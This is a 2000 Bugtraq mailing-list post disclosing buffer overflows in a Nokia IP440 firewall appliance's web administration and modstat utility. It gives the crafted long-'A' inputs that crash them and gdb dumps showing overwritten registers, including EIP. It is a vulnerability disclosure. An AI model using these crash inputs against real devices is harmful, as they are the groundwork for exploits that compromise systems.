Date: Mon, 27 Nov 2000 02:33:27 -0800 From: K2 <ktwo@KTWO.CA> Subject: Nokia firewalls To: BUGTRAQ@SECURITYFOCUS.COM Hi, Well I just unwrapped my shiny new Nokia IP440 integrated Firewall-1/IDS appliance and thought to give it a once over. It appears to be a older fBSD kernel + some firewall (checkpoint 4.1) + some IDS (ISS) + remote admin (SSH/http). Now these vulnerabilities all require an authenticated user, however, it's still amazing to me that a device with security as it's primary function would have so many issues. A request to it's default http administration site... http://127.0.0.1/cgi-bin/html_page?(Ax6000)&TEMPLATE=main will result in "Html_gen exited because of signal: Segmentation fault" After this, any attempt to connect to the site will return, "Error while getting page: Couldn't connect to /tmp/xsets: No such file or directory" the /bin/xpand will die, dumping core in /var/tmp... scrooge:/var/tmp# gdb -c xpand.core-11.27.2000-094458 GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. Modified in 1997, 1998 by Nokia IP Inc. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.13 (i386-unknown-freebsd), Copyright 1994 Free Software Foundation, Inc. Core was generated by `xpand'. Program terminated with signal 11, Segmentation fault. #0 0x10046fb6 in ?? (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4) (gdb) file xpand-11.27.2000-094458 Reading symbols from xpand-11.27.2000-094458...done. (gdb) bt #0 0x10046fb6 in end (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4) #1 0xefbfd3b8 in end (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4) #2 0x10047110 in end (7d380, 41414141, 1004f060, 36158, 33b18, efbfd3f0, 100446df, 7cb40) #3 0x10044233 in end (7cb40, 41414141, 41414141, 0, 1004f060, efbfd408, 1004416c, 5fec0) #4 0x100446df in end (5fec0, 41414141, 41414141, 1004f060, efbfd42c, 1004732e, 3a020, efbfd444) #5 0x1004416c in end (3a020, efbfd444, 1004f060, 5fec0, 31680, 0, 56, efbfd44c) #6 0x1004732e in end (321a0, 10044144, efbfd444, 1004f060, 100446bc, 5fec0, efbfd46c, 10044713) #7 0x100441ac in end (332a0, 100446bc, 5fec0, efbfd4b0, 7f0c0, 0, efbfd65c, 21983) #8 0x10044713 in end (31680, 10013, 17a7, 66000, 0, 0, 0, 0) #9 0x21983 in handle_template_request (d=0x34000, request=0x66000 "USER admin\n", 'A' <repeats 189 times>..., request_len=6055, fd=9, fd_af=1, 1004f060, 40f40, 654b0) at xcommit.c:1053 #10 0x22d6a in stream_set ( fdi=0x654a0, 1004f060, 1, 654b0, 0, 6b64632f, 62696c00, 40) at xpand.c:179 #11 0x10041491 in end (0, 1, 0, 38000, efbfda60, 23354, 1, 0) #12 0x10046ec0 in end (1, 0, efbfda88, efbfda84, 0, 654a0, 29000, d) ---Type <return> to continue, or q <return> to quit--- #13 0x23354 in main (argc=1, argv=0xefbfda88, efbfda90, 0, 0, 29000, 0, 1) at xpand.c:385 (gdb) info reg eax 0x41414141 1094795585 ecx 0x41414141 1094795585 edx 0x0 0 ebx 0x1004f060 268759136 esp 0xefbfd394 0xefbfd394 ebp 0xefbfd394 0xefbfd394 esi 0x7d380 512896 edi 0x41414141 1094795585 eip 0x10046fb6 0x10046fb6 ps 0x10206 66054 cs 0x1f 31 ss 0x27 39 ds 0xefbf0027 -272695257 es 0x80027 524327 (gdb) also.... scrooge:/var/tmp# gdb -c html_gen.core (gdb) info reg eax 0x88dc 35036 ecx 0xfffffffc -4 edx 0x4949 18761 ebx 0x1009b060 269070432 esp 0xefbfaa74 0xefbfaa74 ebp 0xefbfaa84 0xefbfaa84 esi 0x0 0 edi 0x41414141 1094795585 eip 0x10084d1b 0x10084d1b ps 0x10216 66070 cs 0x1f 31 ss 0x27 39 ds 0x27 39 es 0x27 39 (gdb) also, scrooge:/var/tmp# ./modstat -n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Type Id Off Loadaddr Size Info Rev Module Name modstat: LMSTAT: Bad file descriptor Segmentation fault (core dumped) (gdb) info reg eax 0x4 4 ecx 0xefbfcfb8 -272642120 edx 0xefbfcfb8 -272642120 ebx 0x0 0 esp 0xefbfd354 0xefbfd354 ebp 0x41414141 0x41414141 esi 0xffffffff -1 edi 0x3 3 eip 0x41414141 0x41414141 Anyhow, I just thought they may want to clean these things up... K2